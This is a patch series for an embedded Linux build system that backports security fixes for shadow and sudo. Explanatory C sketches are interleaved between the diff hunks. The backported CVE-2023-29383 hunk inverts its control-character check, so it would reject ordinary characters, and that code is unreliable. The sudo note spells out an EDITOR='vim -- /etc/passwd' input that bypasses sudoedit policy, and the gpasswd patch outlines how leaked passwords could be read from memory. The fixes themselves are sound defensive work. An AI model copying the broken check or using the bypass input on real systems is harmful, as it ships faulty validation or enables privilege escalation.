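            if (iscntrl(c)) {
                err = -1;                    /* control characters are rejected */
                break;
            }
        }
        return err;
    }

    int main(void)
    {
        printf("%d\n", valid_field("alice", ":,="));     /*  0: clean       */
        printf("%d\n", valid_field("al:ce", ":,="));     /* -1: illegal ':' */
        printf("%d\n", valid_field("al\tce", ""));       /* -1: control char */
        printf("%d\n", valid_field("caf\xc3\xa9", ""));  /*  1: non-printable */
        return 0;
    }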
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-29383.patch b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
new file mode 100644
index 0000000000..dbf4a508e9
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
@@ -0,0 +1,54 @@
+From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001
+From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com>
+Date: Thu, 23 Mar 2023 23:39:38 +0000
+Subject: [PATCH] Added control character check
+
+Added control character check, returning -1 (to "err") if control characters are present.
+
+CVE: CVE-2023-29383
+Upstream-Status: Backport
+
+Reference to upstream:
+https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 11 +++++++----
+ 1 file changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index 640be931..fb51b582 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -21,9 +21,9 @@
+ *
+ * The supplied field is scanned for non-printable and other illegal
+ * characters.
+- * + -1 is returned if an illegal character is present.
+- * + 1 is returned if no illegal characters are present, but the field
+- * contains a non-printable character.
++ * + -1 is returned if an illegal or control character is present.
++ * + 1 is returned if no illegal or control characters are present,
++ * but the field contains a non-printable character.
+ * + 0 is returned otherwise.
+ */
+ int valid_field (const char *field, const char *illegal)
+@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal)
+ }
+
+ if (0 == err) {
+- /* Search if there are some non-printable characters */
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+ if (!isprint (*cp)) {
+ err = 1;
++ }
++ if (!iscntrl (*cp)) {
++ err = -1;
+ break;
+ }
+ }
+--
+2.34.1
+
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
new file mode 100644
index 0000000000..75dbbad299
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
@@ -0,0 +1,146 @@
+From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001
+From: Alejandro Colomar <alx@kernel.org>
+Date: Sat, 10 Jun 2023 16:20:05 +0200
+Subject: [PATCH] gpasswd(1): Fix password leak
+
+CVE: CVE-2023-4641
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904]
+
+How to trigger this password leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When gpasswd(1) asks for the new password, it asks twice (as is usual
+for confirming the new password). Each of those 2 password prompts
+uses agetpass() to get the password. If the second agetpass() fails,
+the first password, which has been copied into the 'static' buffer
+'pass' via STRFCPY(), wasn't being zeroed.
+
+agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and
+can fail for any of the following reasons:
+
+- malloc(3) or readpassphrase(3) failure.
+
+ These are going to be difficult to trigger. Maybe getting the system
+ to the limits of memory utilization at that exact point, so that the
+ next malloc(3) gets ENOMEM, and possibly even the OOM is triggered.
+ About readpassphrase(3), ENFILE and EINTR seem the only plausible
+ ones, and EINTR probably requires privilege or being the same user;
+ but I wouldn't discard ENFILE so easily, if a process starts opening
+ files.
+
+- The password is longer than PASS_MAX.
+
+ This is plausible with physical access. However, at that point, a
+ keylogger will be a much simpler attack.
+
+And, the attacker must be able to know when the second password is being
+introduced, which is not going to be easy.
+
+How to read the password after the leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Provoking the leak yourself at the right point by entering a very long
+password is easy, and inspecting the process stack at that point should
+be doable. Try to find some consistent patterns.
+
+Then, search for those patterns in free memory, right after the victim
+leaks their password.
+
+Once you get the leak, a program should read all the free memory
+searching for patterns that gpasswd(1) leaves nearby the leaked
+password.
+
+On 6/10/23 03:14, Seth Arnold wrote:
+> An attacker process wouldn't be able to use malloc(3) for this task.
+> There's a handful of tools available for userspace to allocate memory:
+>
+> - brk / sbrk
+> - mmap MAP_ANONYMOUS
+> - mmap /dev/zero
+> - mmap some other file
+> - shm_open
+> - shmget
+>
+> Most of these return only pages of zeros to a process. Using mmap of an
+> existing file, you can get some of the contents of the file demand-loaded
+> into the memory space on the first use.
+>
+> The MAP_UNINITIALIZED flag only works if the kernel was compiled with
+> CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare.
+>
+> malloc(3) doesn't zero memory, to our collective frustration, but all the
+> garbage in the allocations is from previous allocations in the current
+> process. It isn't leftover from other processes.
+>
+> The avenues available for reading the memory:
+> - /dev/mem and /dev/kmem (requires root, not available with Secure Boot)
+> - /proc/pid/mem (requires ptrace privileges, mediated by YAMA)
+> - ptrace (requires ptrace privileges, mediated by YAMA)
+> - causing memory to be swapped to disk, and then inspecting the swap
+>
+> These all require a certain amount of privileges.
+
+How to fix it?
+~~~~~~~~~~~~~~
+
+memzero(), which internally calls explicit_bzero(3), or whatever
+alternative the system provides with a slightly different name, will
+make sure that the buffer is zeroed in memory, and optimizations are not
+allowed to impede this zeroing.
+
+This is not really 100% effective, since compilers may place copies of
+the string somewhere hidden in the stack. Those copies won't get zeroed
+by explicit_bzero(3). However, that's arguably a compiler bug, since
+compilers should make everything possible to avoid optimizing strings
+that are later passed to explicit_bzero(3). But we all know that
+sometimes it's impossible to have perfect knowledge in the compiler, so
+this is plausible. Nevertheless, there's nothing we can do against such
+issues, except minimizing the time such passwords are stored in plain
+text.
+
+Security concerns
+~~~~~~~~~~~~~~~~~
+
+We believe this isn't easy to exploit. Nevertheless, and since the fix
+is trivial, this fix should probably be applied soon, and backported to
+all supported distributions, to prevent someone else having more
+imagination than us to find a way.
+
+Affected versions
+~~~~~~~~~~~~~~~~~
+
+All. Bug introduced in shadow 19990709. That's the second commit in
+the git history.
+
+Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)")
+Reported-by: Alejandro Colomar <alx@kernel.org>
+Cc: Serge Hallyn <serge@hallyn.com>
+Cc: Iker Pedrosa <ipedrosa@redhat.com>
+Cc: Seth Arnold <seth.arnold@canonical.com>
+Cc: Christian Brauner <christian@brauner.io>
+Cc: Balint Reczey <rbalint@debian.org>
+Cc: Sam James <sam@gentoo.org>
+Cc: David Runge <dvzrv@archlinux.org>
+Cc: Andreas Jaeger <aj@suse.de>
+Cc: <~hallyn/shadow@lists.sr.ht>
+Signed-off-by: Alejandro Colomar <alx@kernel.org>
+Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com>
+---
+ src/gpasswd.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/gpasswd.c b/src/gpasswd.c
+index 4d75af96..a698b32a 100644
+--- a/src/gpasswd.c
++++ b/src/gpasswd.c
+@@ -918,6 +918,7 @@ static void change_passwd (struct group *gr)
+ strzero (cp);
+ cp = getpass (_("Re-enter new password: "));
+ if (NULL == cp) {
++ memzero (pass, sizeof pass);
+ exit (1);
+ }
+
+--
+2.42.0
+
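Editorial note: the one-line gpasswd fix wipes the static password buffer when the confirmation prompt fails, so the first entry cannot linger in memory. The patch uses shadow's memzero(); the sketch below (not gpasswd code; prompt() and the buffer size are stand-ins) uses explicit_bzero(3), which, unlike a plain memset() right before exit(), is not removed by dead-store elimination.

    /* Standalone sketch (not gpasswd code): wipe the first password if the
     * confirmation prompt fails. explicit_bzero() stands in for shadow's
     * memzero(). */
    #define _DEFAULT_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define PASS_MAX_LEN 128

    static char pass[PASS_MAX_LEN];          /* stands in for gpasswd's buffer */

    static char *prompt(const char *msg)     /* stand-in for getpass()/agetpass() */
    {
        static char buf[PASS_MAX_LEN];
        printf("%s", msg);
        return fgets(buf, sizeof(buf), stdin) ? buf : NULL;
    }

    int main(void)
    {
        char *cp = prompt("New password: ");
        if (cp == NULL)
            exit(1);
        snprintf(pass, sizeof(pass), "%s", cp);

        cp = prompt("Re-enter new password: ");
        if (cp == NULL) {
            explicit_bzero(pass, sizeof(pass));  /* the step the CVE fix adds */
            exit(1);
        }
        /* ... compare, hash, store ... */
        explicit_bzero(pass, sizeof(pass));
        return 0;
    }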
diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
index 5f7ea00bf1..4e68f826c6 100644
--- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
+++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass"
HOMEPAGE = "http://github.com/shadow-maint/shadow"
BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
SECTION = "base utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5"
DEPENDS = "base-passwd"
diff --git a/meta/recipes-extended/shadow/shadow.inc b/meta/recipes-extended/shadow/shadow.inc
index f86e5e03c0..c16292c38a 100644
--- a/meta/recipes-extended/shadow/shadow.inc
+++ b/meta/recipes-extended/shadow/shadow.inc
@@ -1,8 +1,9 @@
SUMMARY = "Tools to change and administer password and group data"
HOMEPAGE = "http://github.com/shadow-maint/shadow"
+DESCRIPTION = "${SUMMARY}"
BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
SECTION = "base/utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \
file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af"
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}.
file://shadow-4.1.3-dots-in-usernames.patch \
${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \
file://shadow-relaxed-usernames.patch \
+ file://CVE-2023-29383.patch \
+ file://0001-Overhaul-valid_field.patch \
+ file://CVE-2023-4641.patch \
"
SRC_URI_append_class-target = " \
diff --git a/meta/recipes-extended/shadow/shadow_4.8.1.bb b/meta/recipes-extended/shadow/shadow_4.8.1.bb
index c975395ff8..9dfcd4bc10 100644
--- a/meta/recipes-extended/shadow/shadow_4.8.1.bb
+++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p
BBCLASSEXTEND = "native nativesdk"
+# Severity is low; the issue is marked as closed, won't fix.
+# https://bugzilla.redhat.com/show_bug.cgi?id=884658
+CVE_CHECK_WHITELIST += "CVE-2013-4235"
+# This CVE affects a different project that is also named shadow
+CVE_CHECK_WHITELIST += "CVE-2016-15024"
diff --git a/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
new file mode 100644
index 0000000000..9dfca0441b
--- /dev/null
+++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
@@ -0,0 +1,26 @@
+From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Sat, 23 Oct 2021 20:20:59 +0200
+Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage.
+
+This helps reproducibility.
+
+Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ Makefile | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile b/Makefile
+index 886018f9..f4290f9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -412,7 +412,7 @@ git-commit-id.h:
+ $(OBJS): stress-ng.h Makefile
+
+ stress-ng.1.gz: stress-ng.1
+- gzip -c $< > $@
++ gzip -n -c $< > $@
+
+ .PHONY: dist
+ dist:
diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
index 9b987c7bde..cf94e0275b 100644
--- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \
+SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \
file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
+ file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \
"
-SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae"
-SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0"
+SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"
+S = "${WORKDIR}/git"
DEPENDS = "coreutils-native"
diff --git a/meta/recipes-extended/sudo/files/CVE-2023-22809.patch b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
new file mode 100644
index 0000000000..6c47eb3e44
--- /dev/null
+++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
@@ -0,0 +1,113 @@
+Backport of:
+
+# HG changeset patch
+# Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a
+sudoedit: do not permit editor arguments to include "--"
+We use "--" to separate the editor and arguments from the files to edit.
+If the editor arguments include "--", sudo can be tricked into allowing
+the user to edit a file not permitted by the security policy.
+Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com) for finding this bug.
+
+CVE: CVE-2023-22809
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]
+Signed-off-by: Omkar Patil <omkar.patil@kpit.com>
+
+--- a/plugins/sudoers/editor.c
++++ b/plugins/sudoers/editor.c
+@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed
+ const char *cp, *ep, *tmp;
+ const char *edend = ed + edlen;
+ struct stat user_editor_sb;
+- int nargc;
++ int nargc = 0;
+ debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL)
+
+ /*
+@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed
+ free(editor_path);
+ while (nargc--)
+ free(nargv[nargc]);
++ free(nargv);
++ debug_return_str(NULL);
++ }
++
++ /*
++ * We use "--" to separate the editor and arguments from the files
++ * to edit. The editor arguments themselves may not contain "--".
++ */
++ if (strcmp(nargv[nargc], "--") == 0) {
++ sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
++ sudo_warnx("%s", U_("editor arguments may not contain \"--\""));
++ errno = EINVAL;
++ free(editor_path);
++ while (nargc--)
++ free(nargv[nargc]);
+ free(nargv);
+ debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoers.c
++++ b/plugins/sudoers/sudoers.c
+@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con
+
+ /* Note: must call audit before uid change. */
+ if (ISSET(sudo_mode, MODE_EDIT)) {
++ const char *env_editor = NULL;
+ int edit_argc;
+- const char *env_editor;
+
+ free(safe_cmnd);
+ safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc,
+ &edit_argv, NULL, &env_editor, false);
+ if (safe_cmnd == NULL) {
+- if (errno != ENOENT)
++ switch (errno) {
++ case ENOENT:
++ audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ sudo_warnx(U_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ goto bad;
++ case EINVAL:
++ if (def_env_editor && env_editor != NULL) {
++ /* User tried to do something funny with the editor. */
++ log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL,
++ "invalid user-specified editor: %s", env_editor);
++ goto bad;
++ }
++ /* FALLTHROUGH */
++ default:
+ goto done;
+- audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- sudo_warnx(U_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- goto bad;
++ }
+ }
+ if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors)
+ goto done;
+--- a/plugins/sudoers/visudo.c
++++ b/plugins/sudoers/visudo.c
+@@ -308,7 +308,7 @@ static char *
+ get_editor(int *editor_argc, char ***editor_argv)
+ {
+ char *editor_path = NULL, **whitelist = NULL;
+- const char *env_editor;
++ const char *env_editor = NULL;
+ static char *files[] = { "+1", "sudoers" };
+ unsigned int whitelist_len = 0;
+ debug_decl(get_editor, SUDOERS_DEBUG_UTIL)
+@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi
+ if (editor_path == NULL) {
+ if (def_env_editor && env_editor != NULL) {
+ /* We are honoring $EDITOR so this is a fatal error. */
+- sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor);
++ if (errno == ENOENT) {
++ sudo_warnx(U_("specified editor (%s) doesn't exist"),
++ env_editor);
++ }
++ exit(EXIT_FAILURE);
+ }
+ sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor);
+ }
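
The essence of the added check can be shown in isolation. The sketch below is not sudo's actual parser; check_editor() and the simple whitespace splitting are illustrative assumptions. It rejects an EDITOR-style string as soon as any token equals "--", which is what stops user-supplied editor arguments from shifting the editor/file boundary; the widely published trick for CVE-2023-22809 is along the lines of EDITOR='vim -- /etc/passwd' used against a sudoedit rule that only allows some harmless file.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Return 0 if the editor string is acceptable, -1 if any token is "--". */
    static int check_editor(const char *ed)
    {
        char *copy = strdup(ed);
        if (copy == NULL)
            return -1;
        int rc = 0;
        for (char *tok = strtok(copy, " \t"); tok != NULL; tok = strtok(NULL, " \t")) {
            if (strcmp(tok, "--") == 0) {   /* would fake the editor/file separator */
                rc = -1;
                break;
            }
        }
        free(copy);
        return rc;
    }

    int main(void)
    {
        printf("%d\n", check_editor("vim"));                  /*  0: accepted */
        printf("%d\n", check_editor("vim -- /etc/passwd"));   /* -1: rejected */
        return 0;
    }
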
diff --git a/meta/recipes-extended/sudo/sudo.inc b/meta/recipes-extended/sudo/sudo.inc
index 5d27d46928..9c7279d25a 100644
--- a/meta/recipes-extended/sudo/sudo.inc
+++ b/meta/recipes-extended/sudo/sudo.inc
@@ -3,8 +3,8 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain
HOMEPAGE = "http://www.sudo.ws"
BUGTRACKER = "http://www.sudo.ws/bugs/"
SECTION = "admin"
-LICENSE = "ISC & BSD & Zlib"
-LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=4d1b44b1576eea036d78b8cc961aa93d \
+LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib"
+LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \
file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \
file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \
file://lib/util/fnmatch.c;beginline=3;endline=27;md5=004d7d2866ba1f5b41174906849d2e0f \
@@ -49,3 +49,5 @@ do_compile_prepend () {
do_install_prepend (){
mkdir -p ${D}/${localstatedir}/lib
}
+
+CVE_VERSION_SUFFIX = "patch"
diff --git a/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
new file mode 100644
index 0000000000..6ee2d5c11e
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
@@ -0,0 +1,29 @@
+From f4e9e4337f8844d199515ff2b762c914dd254cbd Mon Sep 17 00:00:00 2001
+From: Dan Robertson <dan@dlrobertson.com>
+Date: Sat, 16 May 2020 00:12:44 +0000
+Subject: [PATCH] Fix includes when building with musl
+
+Include sys/types.h for mode_t and id_t in sudo_debug.h
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/f4e9e4337f8844d199515ff2b762c914dd254cbd]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ include/sudo_debug.h | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/include/sudo_debug.h b/include/sudo_debug.h
+index 180f2096f..0124b0b19 100644
+--- a/include/sudo_debug.h
++++ b/include/sudo_debug.h
+@@ -25,6 +25,7 @@
+ #else
+ # include "compat/stdbool.h"
+ #endif
++#include <sys/types.h>
+ #include "sudo_queue.h"
+
+ /*
+--
+2.25.1
+
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
new file mode 100644
index 0000000000..1336c7701d
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
@@ -0,0 +1,59 @@
+From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 15 Nov 2022 09:17:18 +0530
+Subject: [PATCH] CVE-2022-43995
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050]
+CVE: CVE-2022-43995
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Potential heap overflow for passwords < 8
+characters. Starting with sudo 1.8.0 the plaintext password buffer is
+dynamically sized so it is not safe to assume that it is at least 9 bytes in
+size.
+Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz.
+---
+ plugins/sudoers/auth/passwd.c | 11 +++++------
+ 1 file changed, 5 insertions(+), 6 deletions(-)
+
+diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c
+index 03c7a16..76a7824 100644
+--- a/plugins/sudoers/auth/passwd.c
++++ b/plugins/sudoers/auth/passwd.c
+@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth)
+ int
+ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback)
+ {
+- char sav, *epass;
++ char des_pass[9], *epass;
+ char *pw_epasswd = auth->data;
+ size_t pw_len;
+ int matched = 0;
+@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+
+ /*
+ * Truncate to 8 chars if standard DES since not all crypt()'s do this.
+- * If this turns out not to be safe we will have to use OS #ifdef's (sigh).
+ */
+- sav = pass[8];
+ pw_len = strlen(pw_epasswd);
+- if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len))
+- pass[8] = '\0';
++ if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) {
++ strlcpy(des_pass, pass, sizeof(des_pass));
++ pass = des_pass;
++ }
+
+ /*
+ * Normal UN*X password check.
+@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+ * only compare the first DESLEN characters in that case.
+ */
+ epass = (char *) crypt(pass, pw_epasswd);
+- pass[8] = sav;
+ if (epass != NULL) {
+ if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN)
+ matched = !strncmp(pw_epasswd, epass, DESLEN);
+--
+2.25.1
+
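
A stand-alone sketch of the bounded-copy idea behind this fix (using snprintf instead of the strlcpy the real patch uses, so it builds against plain glibc): the truncation for DES happens in a local 9-byte buffer rather than by writing pass[8] into a caller-owned buffer that may be shorter than 9 bytes.

    #include <stdio.h>

    /* Copy at most 8 password characters into a fixed 9-byte buffer, the way
     * the patched sudo_passwd_verify() copies into des_pass, instead of
     * temporarily writing pass[8] = '\0' into the caller's buffer. */
    static const char *truncate_for_des(const char *pass, char out[9])
    {
        snprintf(out, 9, "%s", pass);   /* bounded copy, always NUL-terminated */
        return out;
    }

    int main(void)
    {
        char des_pass[9];
        /* With a 4-character password the old pass[8] access touched memory
         * past the end of a 5-byte heap allocation. */
        printf("%s\n", truncate_for_des("abcd", des_pass));         /* abcd     */
        printf("%s\n", truncate_for_des("longpassword", des_pass)); /* longpass */
        return 0;
    }
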
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
new file mode 100644
index 0000000000..bc6f8c19a6
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
@@ -0,0 +1,646 @@
+Origin: Backport obtained from SUSE. Thanks!
+
+From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Wed, 18 Jan 2023 08:21:34 -0700
+Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l"
+ output. The log message contains user-controlled strings that could include
+ things like terminal control characters. Space characters in the command
+ path are now also escaped.
+
+Command line arguments that contain spaces are surrounded with
+single quotes and any literal single quote or backslash characters
+are escaped with a backslash. This makes it possible to distinguish
+multiple command line arguments from a single argument that contains
+spaces.
+
+Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com).
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ doc/sudoers.man.in | 33 +++++++--
+ doc/sudoers.mdoc.in | 28 ++++++--
+ doc/sudoreplay.man.in | 9 ++
+ doc/sudoreplay.mdoc.in | 10 ++
+ include/sudo_compat.h | 6 +
+ include/sudo_lbuf.h | 7 ++
+ lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++
+ lib/util/util.exp.in | 1
+ plugins/sudoers/logging.c | 145 +++++++++++--------------------------------
+ plugins/sudoers/sudoreplay.c | 44 +++++++++----
+ 10 files changed, 257 insertions(+), 132 deletions(-)
+
+--- a/doc/sudoers.man.in
++++ b/doc/sudoers.man.in
+@@ -4566,6 +4566,19 @@ can log events using either
+ syslog(3)
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is stored as
++\(oq#011\(cq
++and an embedded carriage return is stored as
++\(oq#015\(cq.
++In addition, space characters in the command path are stored as
++\(oq#040\(cq.
++Literal single quotes and backslash characters
++(\(oq\e\(cq)
++in command line arguments are escaped with a backslash.
+ .SS "Accepted command log entries"
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4646,7 +4659,7 @@ A list of environment variables specifie
+ if specified.
+ .TP 14n
+ command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .PP
+ Messages are logged using the locale specified by
+ \fIsudoers_locale\fR,
+@@ -4882,17 +4895,21 @@ with a few important differences:
+ 1.\&
+ The
+ \fIprogname\fR
+-and
+-\fIhostname\fR
+-fields are not present.
++field is not present.
+ .TP 5n
+ 2.\&
+-If the
+-\fIlog_year\fR
+-option is enabled,
+-the date will also include the year.
++The
++\fIhostname\fR
++is only logged if the
++\fIlog_host\fR
++option is enabled.
+ .TP 5n
+ 3.\&
++The date does not include the year unless the
++\fIlog_year\fR
++option is enabled.
++.TP 5n
++4.\&
+ Lines that are longer than
+ \fIloglinelen\fR
+ characters (80 by default) are word-wrapped and continued on the
+--- a/doc/sudoers.mdoc.in
++++ b/doc/sudoers.mdoc.in
+@@ -4261,6 +4261,19 @@ can log events using either
+ .Xr syslog 3
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is stored as
++.Ql #011
++and an embedded carriage return is stored as
++.Ql #015 .
++In addition, space characters in the command path are stored as
++.Ql #040 .
++Literal single quotes and backslash characters
++.Pq Ql \e
++in command line arguments are escaped with a backslash.
+ .Ss Accepted command log entries
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4328,7 +4341,7 @@ option is enabled.
+ A list of environment variables specified on the command line,
+ if specified.
+ .It command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .El
+ .Pp
+ Messages are logged using the locale specified by
+@@ -4550,14 +4563,17 @@ with a few important differences:
+ .It
+ The
